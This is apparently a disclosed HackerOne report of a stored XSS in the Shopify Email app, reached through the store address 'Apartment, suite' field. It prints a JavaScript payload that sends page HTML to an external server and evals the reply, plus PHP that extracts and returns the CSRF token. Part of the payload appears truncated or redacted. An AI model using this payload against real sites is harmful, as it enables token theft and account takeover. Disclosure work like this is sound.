Shopify: XSS within Shopify Email App - Admin

ID H1:869831
Type hackerone
Reporter francisbeaudoin
Modified 2020-09-14T19:56:53


The Shopify Email Application is vulnerable to XSS

A user with only Settings access can inject html within the Apartment, suite, etc. (optional) of the Store address section that will then be displayed in the Shopify Email Template edition

Steps to reproduce

  1. Open Settings page
  2. Insert malicious HTML within the Apartment, suite, etc. (optional) field. Please note that the inserted code is a bit too complex for nothing but was just trying out if it was possible to "bypass" the 255 characters limit , which is possible. (Code snippet can be found below). ██████
  3. Install Shopify Email App
  4. Select a template that displays Apartment, suite, etc. (optional) field {F822194}

Javascript code used

<img src="a:" onerror="var t=setTimeout;t(function(){var b=function(d){var x=new XMLHttpRequest;t(function(){eval(x.responseText)},2000);'POST','');x.send(d)};window.parent.postMessage(b(document.head.innerHTML),'*');},2000)"/>

PHP code of used in the XMLHttpRequest

``` <? header("Access-Control-Allow-Origin: *");

$html = file_get_contents('php://input');

$doc = DOMDocument::loadHTML($html); $xpath = new DOMXPath($doc); $query = "//meta[@name='csrf-token']"; $entries = $xpath->query($query);

$csrf = ""; foreach ($entries as $entry) { $csrf = $entry->getAttribute('content'); break; }

$request = "alert('CSRF Token: " . $csrf . "');";

echo $request;



An attacker could at least trigger requests to the endpoint.